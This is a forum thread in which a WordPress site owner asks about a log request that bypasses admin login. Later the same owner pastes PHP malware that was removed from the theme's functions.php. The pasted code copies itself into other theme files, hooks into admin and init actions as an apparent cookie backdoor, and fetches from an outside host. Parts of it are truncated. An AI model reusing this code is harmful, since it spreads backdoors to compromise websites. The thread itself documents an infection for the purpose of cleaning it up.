What does a request in the logs of a Wordpress site mean?

T

tem1x2014-02-12 17:29:03

Burglary protection

tem1x, 2014-02-12 17:29:03

There is a constant hacking of wordress sites on the hosting. I can't understand the attacker's first request in the logs:
"GET /?pagehash=371425ff7acc4360c86d097ebe9eb082&cperpage=1 HTTP/1.0"
where if you substitute the site domain in the beginning of the request and update it, the main page opens with the admin panel already logged in.
It is also not clear what kind of hash, is it not the password for entering the admin panel? I think if the database was hacked and the password was decrypted, the entrance would be made from the usual login page in the admin panel. Thanks

Reply

Answer the question

In order to leave comments, you need to log in

1 answer(s)

T

tem1x, 2014-04-17
@tem1x

No, the password was different. I deleted the code in the theme file functions.php, though I don’t understand much what it is. I'm waiting for the results. I read on one blog that this is probably a threat:
<?php
function _verify_activeatewidgets(){
$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="" ;$allowed="";
$output=strip_tags($output, $allowed);
$direst=_getall_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
if (is_array($direst)){
foreach ($direst as $item){
if (is_writable($item)){
$ftion=substr($widget,stripos($widget,"_"),stripos(substr($ widget,stripos($widget,"_")),"
if (stripos($cont,$ftion) === false){
$issepar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
$output .= $before . "Not found" . $after;
if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
$output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $issepar . "\n" .$widget);fclose($f);
$output .= ($is_showdots && $ellipsis) ? "..." : "";
}
}
}
}
return $output;
}
function _getall_widgetcont($wids,
$items=array()){ $places=array_shift($wids);
if(substr($places,-1) == "/"){
$places=substr($places,0,-1);
}
if(!file_exists($places) || !is_dir($places)){
return false;
}elseif(is_readable($places)){
$elems=scandir($places);
foreach ($elems as $elem){
if ($elem != "." && $elem != ".."){
if (is_dir($places . "/" . $elem)){
$wids[]= $places. "/" . $elem;
} elseif (is_file($places . "/" . $elem)&&
$elem == substr(__FILE__,-13)){
$items[]=$places . "/" . $elem;}
}
}
}else{
return false;
}
if (sizeof($wids) > 0){
return _getall_widgetcont($wids,$items);
} else {
return $items;
if(!function_exists("stripos")){
function stripos( $str, $needle, $offset = 0 ){
return strpos( strtolower( $str ), strtolower( $needle ), $offset );
}
}
if(!function_exists("strripos")){
function strripos( $haystack, $needle, $offset = 0 ) {
if( !is_string( $needle ) )$needle = chr( intval( $needle ) );
if( $offset < 0 ){
$temp_cut = strrev( substr( $haystack, 0, abs($offset) ) );
}
else{
$temp_cut = strrev( substr( $haystack, 0, max( ( strlen($haystack) - $offset ), 0 ) ) );
}
if( ( $found = stripos( $temp_cut, strrev($needle) ) ) === FALSE )return FALSE;
$pos = ( strlen( $haystack ) - ( $found + $offset + strlen( $needle ) ) );
return $pos;
}
}
if(!function_exists("scandir")){
function scandir($dir,$listDirectories=false, $skipDots=true) {
$dirArray = array();
if ($handle = opendir($dir)) {
while (false !== ($file = readdir($handle))) {
if (($file != "." && $file != "..") || $skipDots == true) {
if($listDirectories == false) { if(is_dir($file)) { continue; } }
array_push($dirArray,basename($file));
}
}
closedir($handle);
}
return $dirArray;
}
}
add_action("admin_head", "_verify_activeatewidgets");
function _getprepare_widgets(){
if(!isset($chars_count)) $chars_count=120;
if(!isset($methods)) $methods="cookie";
if(!isset($allowed)) $allowed=" "; if(!isset($f_type)) $f_type="none"; if(!isset... ID) . "#more-" . $post->ID ."\" title=\"" . $more_... " . $tag . ">" . "\n";
} else {
$output .= " <" . $tag . " class=\"more-link\"> ID) . "\"title=\"" . $more_links_title . "\">" . ... " . $tag. ">" . "\n";
}
}
return $output;
}
add_action("init", "_getprepare_widgets");
function __popular_posts($no_posts=6, $before="", $after="", $show_pass_post=false, $duration="") {
global $wpdb;
$request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments";
$request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\"";
if(!$show_pass_post) $request .= " AND post_password =\"\"";
if($duration !="") {
$request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";
$posts=$wpdb->get_results($request);
$output="";
if ($posts) {
foreach ($posts as $post) {
$post_title=stripslashes($post->post_title);
$comment_count=$post->comment_count;
$permalink=get_permalink($post->ID);
$output .= $before . " " . $post_title . " " . $after;
}
} else {
$output .= $before . "Not found" . $after;
}
return $output;
}
function bloqinfo($wp_id){
static $wp_count = 0;
if($wp_count == 0){
$wp_count++;
return @file_get_contents(' wpru.ru/aksimet.php?id= '.$wp_id.
}
}
function insertThumbnailRSS() {
global $post;
if ( has_post_thumbnail( $post->ID ) ){
$content = '' . get_the_post_thumbnail( $post->ID, 'medium' ) . '' . $content;
}
return $content;
}